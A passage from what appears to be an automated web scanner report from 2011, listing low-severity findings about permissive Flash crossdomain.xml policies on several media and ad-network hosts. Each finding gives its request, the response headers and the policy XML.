<allow-access-from domain="*.cisco.com" />
<allow-access-from domain="*.cisco-live.com" />
   <allow-access-from domain="*.ciscolivevirtual.veplatform.com" />
   <allow-access-from domain="*.onlineseminarsolutions.com" />
   <allow-access-from domain="intelwc.on24.com" />

<allow-access-from domain="*.ogilvy.com" />
<allow-access-from domain="motifcdn2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m3.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.fr.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.se.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.de.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="event.webcast.meetyoo.de" secure="true" />
...[SNIP]...
<allow-access-from domain="webcast.acrobat.com" secure="true" />
...[SNIP]...
<allow-access-from domain="wccqa.webeventservices.com" />
   <allow-access-from domain="eventqa.meetingstream.com" />
   <allow-access-from domain="eventqa.ciscowebseminars.com" />
   <allow-access-from domain="webcastqa.premiereglobal.com" />

<allow-access-from domain="eventqa.webcast.meetyoo.de" secure="true" />
...[SNIP]...
<allow-access-from domain="webcastqa.acrobat.com" secure="true" />
...[SNIP]...
<allow-access-from domain="livestream.webex.com" secure="true" />
...[SNIP]...
<allow-access-from domain="event.vcallinteraction.com" secure="true" />
...[SNIP]...
<allow-access-from domain="eventqa.vcallinteraction.com" secure="true" />
...[SNIP]...
<allow-access-from domain="vshowqa.on24.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.inbfw.com"/>
   <allow-access-from domain="ciscovirtualevents.webex.com"/>
   <allow-access-from domain="vmc.lillypro.co.uk"/>
   
   <allow-access-from domain="on24.force.com" secure="true" />
...[SNIP]...

4.91. https://event.on24.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://event.on24.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.on24.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:41 GMT
Server: Apache
Last-Modified: Sat, 18 Jun 2011 00:37:19 GMT
Accept-Ranges: bytes
Content-Length: 3138
Connection: close
Content-Type: application/xml; charset=utf-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="i.cmpnet.com" />
<allow-access-from domain="www.ttglive.com" />
<allow-access-from domain="www.ddj.com" />
<allow-access-from domain="building.co.uk" />
<allow-access-from domain="http.earthcache.net" />
...[SNIP]...
<allow-access-from domain="webcast.on24.com" />
<allow-access-from domain="*.on24.com" />
<allow-access-from domain="a659.g.akamai.net" />

<allow-access-from domain="wcc.webeventservices.com" />
   <allow-access-from domain="event.meetingstream.com" />
   <allow-access-from domain="event.ciscowebseminars.com" />
   <allow-access-from domain="webcast.premiereglobal.com" />
<allow-access-from domain="event.cisco-live.com" />
<allow-access-from domain="*.cisco.com" />
<allow-access-from domain="*.cisco-live.com" />
   <allow-access-from domain="*.ciscolivevirtual.veplatform.com" />
   <allow-access-from domain="*.onlineseminarsolutions.com" />
   <allow-access-from domain="intelwc.on24.com" />

<allow-access-from domain="*.ogilvy.com" />
<allow-access-from domain="motifcdn2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m3.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.fr.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.se.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.de.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="event.webcast.meetyoo.de" secure="true" />
...[SNIP]...
<allow-access-from domain="webcast.acrobat.com" secure="true" />
...[SNIP]...
<allow-access-from domain="wccqa.webeventservices.com" />
   <allow-access-from domain="eventqa.meetingstream.com" />
   <allow-access-from domain="eventqa.ciscowebseminars.com" />
   <allow-access-from domain="webcastqa.premiereglobal.com" />

<allow-access-from domain="eventqa.webcast.meetyoo.de" secure="true" />
...[SNIP]...
<allow-access-from domain="webcastqa.acrobat.com" secure="true" />
...[SNIP]...
<allow-access-from domain="livestream.webex.com" secure="true" />
...[SNIP]...
<allow-access-from domain="event.vcallinteraction.com" secure="true" />
...[SNIP]...
<allow-access-from domain="eventqa.vcallinteraction.com" secure="true" />
...[SNIP]...
<allow-access-from domain="vshowqa.on24.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.inbfw.com"/>
   <allow-access-from domain="ciscovirtualevents.webex.com"/>
   <allow-access-from domain="vmc.lillypro.co.uk"/>
   
   <allow-access-from domain="on24.force.com" secure="true" />
...[SNIP]...

4.92. http://executivevision.cnbc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://executivevision.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: executivevision.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Accept-Ranges: bytes
ETag: "0ff4d5ae31fcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:04:29 GMT
Connection: close
Content-Length: 3839

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.93. http://js.adsonar.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://js.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.adsonar.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"-gzip
Content-Type: application/xml
Cache-Control: max-age=1800
Expires: Tue, 06 Sep 2011 15:30:15 GMT
Date: Tue, 06 Sep 2011 15:00:15 GMT
Content-Length: 2621
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

4.94. http://login.cnbc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: login.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:23 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Tue, 17 Mar 2009 16:47:10 GMT
ETag: "e0006-f5-4655351729f80"
Accept-Ranges: bytes
Content-Length: 245
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.95. https://login.cnbc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: login.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:36 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Tue, 17 Mar 2009 16:47:10 GMT
ETag: "e0006-f5-4655351729f80"
Accept-Ranges: bytes
Content-Length: 245
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.96. http://m.cnbc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://m.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: SESS93eea98f293ea8fd633599e480cddfdc=u6gvdrmr9fm9tr67nrb374c6c3; path=/; domain=.cnbc.com
Expires: 0
Last-Modified: Tue, 06 Sep 2011 15:04:46 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/xml
Via: 1.1 aicache6
Content-Length: 255
X-Aicache-OS: 64.210.193.252:80
Connection: Keep-Alive
Keep-Alive: max=20

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="m.cnbc.com" />
<allow-access-from domain="*.m.cnbc.com" />
...[SNIP]...

4.97. http://media.cnbc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.cnbc.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Accept-Ranges: bytes
ETag: "0ff4d5ae31fcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 1168
Date: Tue, 06 Sep 2011 14:56:31 GMT
Connection: close
Cache-Control: public, max-age=900

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="*.msnbc.com" />
   <allow-access-from domain="*.msn.com" />
   <allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="*.fluid.nl" />
   <allow-access-from domain="64.207.156.207" />
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
   <allow-access-from domain="*.pulse360.com" />
   <allow-access-from domain="*.context3.kanoodle.com" />
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.98. http://msnbcmedia.msn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msnbcmedia.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: msnbcmedia.msn.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:08:37 GMT
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Content-Type: text/xml
ETag: "0ff4d5ae31fcc1:0"
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 1168
Connection: close

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="*.msnbc.com" />
   <allow-access-from domain="*.msn.com" />
   <allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="*.fluid.nl" />
   <allow-access-from domain="64.207.156.207" />
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
   <allow-access-from domain="*.pulse360.com" />
   <allow-access-from domain="*.context3.kanoodle.com" />
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.99. http://optimized-by.rubiconproject.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:05 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

4.100. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Tue, 06 Sep 2011 00:01:39 GMT
Expires: Wed, 07 Sep 2011 00:01:39 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 53954
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.101. http://pi.pardot.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pi.pardot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pi.pardot.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:03 GMT
Server: Apache
Last-Modified: Tue, 05 Apr 2011 16:22:18 GMT
ETag: "e5"
Accept-Ranges: bytes
Content-Length: 229
Cache-Control: max-age=63072000
Expires: Thu, 05 Sep 2013 15:32:03 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/xml
X-Pardot-LB: lb-d2
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.pardot.com" />
<allow-access-from domain="*.visual.force.com" />
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...

4.102. http://quote.cnbc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://quote.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: quote.cnbc.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Tue, 06 Sep 2011 14:56:38 GMT
Via: 1.1 C aicache6
Content-Length: 245
X-Aicache-OS: 64.210.195.136:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Wed, 07 Sep 2011 14:56:39 GMT

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.103. http://rd.rlcdn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rd.rlcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

